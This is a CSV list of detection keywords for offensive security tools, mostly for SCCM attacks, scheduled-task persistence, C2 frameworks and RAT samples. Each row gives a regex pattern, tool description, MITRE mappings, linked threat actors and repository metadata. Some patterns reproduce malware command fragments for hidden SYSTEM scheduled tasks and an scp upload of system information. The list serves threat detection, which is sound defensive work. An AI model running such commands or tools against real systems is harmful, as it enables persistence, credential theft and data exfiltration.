"*ScareCrow_checksums.txt*",".{0,1000}ScareCrow_checksums\.txt.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58149"
"*SCCM_DLLSiteloading.txt*",".{0,1000}SCCM_DLLSiteloading\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","58150"
"*sccmdecryptpoc.*",".{0,1000}sccmdecryptpoc\..{0,1000}","offensive_tool_keyword","sccmdecryptpoc","SCCM Account Password Decryption POC","T1555.003","TA0006","N/A","N/A","Credential Access","https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58151"
"*sccmhunter.db",".{0,1000}sccmhunter\.db","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58152"
"*sccmhunter.git*",".{0,1000}sccmhunter\.git.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58153"
"*sccmhunter.py*",".{0,1000}sccmhunter\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58154"
"*SCCMSecrets.py*",".{0,1000}SCCMSecrets\.py.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","58155"
"*SCCMVNC.exe*",".{0,1000}SCCMVNC\.exe.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","58156"
"*sccmwtf.py*",".{0,1000}sccmwtf\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","58157"
"*scdivert localhost *",".{0,1000}scdivert\slocalhost\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58158"
"*scecli\0evilpwfilter*",".{0,1000}scecli\\0evilpwfilter.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043  - ","N/A","N/A","Exploitation tool","https://github.com/CyDefUnicorn/OSCP-Archives","1","0","N/A","N/A","N/A","7","620","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z","58159"
"*scheduledtask_utils.py *",".{0,1000}scheduledtask_utils\.py\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","58160"
"*ScheduleRunner.csproj*",".{0,1000}ScheduleRunner\.csproj.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58161"
"*ScheduleRunner.exe*",".{0,1000}ScheduleRunner\.exe.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58162"
"*ScheduleRunner.sln*",".{0,1000}ScheduleRunner\.sln.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","58163"
"*schlamperei.x86.dll*",".{0,1000}schlamperei\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58165"
"*schshell.cna*",".{0,1000}schshell\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58167"
"*SchTask.exe C:\Windows\System32\cmd.exe *",".{0,1000}SchTask\.exe\sC\:\\Windows\\System32\\cmd\.exe\s.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","58168"
"*SchTask_0x727/releases*",".{0,1000}SchTask_0x727\/releases.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","58169"
"*schtask_callback*",".{0,1000}schtask_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","58170"
"*SchTaskBackdoor.*",".{0,1000}SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","58171"
"*schtasks /create /tn ""CursorSvc""*",".{0,1000}schtasks\s\/create\s\/tn\s\""CursorSvc\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58178"
"*schtasks /create /tn *Constants.PERSISTENCE_WINDOWS_TASK +*",".{0,1000}schtasks\s\/create\s\/tn\s.{0,1000}Constants\.PERSISTENCE_WINDOWS_TASK\s\+.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","58179"
"*schtasks /create /tn aitsch /tr * /sc EINMAL /st 00:00:00 /ru ""SYSTEM"" >*",".{0,1000}schtasks\s\/create\s\/tn\saitsch\s\/tr\s.{0,1000}\s\/sc\sEINMAL\s\/st\s00\:00\:00\s\/ru\s\""SYSTEM\""\s\>.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58180"
"*schtasks.exe /create /sc ONCE /tn shutdown /st %tmg% /tr *shutdown.exe*",".{0,1000}schtasks\.exe\s\/create\s\/sc\sONCE\s\/tn\sshutdown\s\/st\s\%tmg\%\s\/tr\s.{0,1000}shutdown\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58184"
"*schtasks_elevator*",".{0,1000}schtasks_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","58185"
"*schtasks_exploit *",".{0,1000}schtasks_exploit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","58186"
"*schtasksabuse.rb*",".{0,1000}schtasksabuse\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58187"
"*SchTasksImplant*",".{0,1000}SchTasksImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58188"
"*schtquery * full*",".{0,1000}schtquery\s.{0,1000}\sfull.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58189"
"*schwarzesonnerat@googlemail.com*",".{0,1000}schwarzesonnerat\@googlemail\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58190"
"*SCNotification.exe.config.malicious*",".{0,1000}SCNotification\.exe\.config\.malicious.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","58191"
"*SCOMDecrypt.csproj*",".{0,1000}SCOMDecrypt\.csproj.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58192"
"*SCOMDecrypt.exe*",".{0,1000}SCOMDecrypt\.exe.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58193"
"*SCOMDecrypt.ps1*",".{0,1000}SCOMDecrypt\.ps1.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58194"
"*scp * feeds.sh:/*",".{0,1000}scp\s.{0,1000}\sfeeds\.sh\:\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","58199"
"*scp * prose.sh:/*",".{0,1000}scp\s.{0,1000}\sprose\.sh\:\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","58200"
"*scp -P *system_info.txt*",".{0,1000}scp\s\-P\s.{0,1000}system_info\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","58202"
"*screen -S dnskire -*",".{0,1000}screen\s\-S\sdnskire\s\-.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","58204"
"*screen_spy.rb*",".{0,1000}screen_spy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58205"
"*screengrab.exe*",".{0,1000}screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","58226"
"*screenshot_inject *",".{0,1000}screenshot_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","58227"
"*screenspy.rb*",".{0,1000}screenspy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common 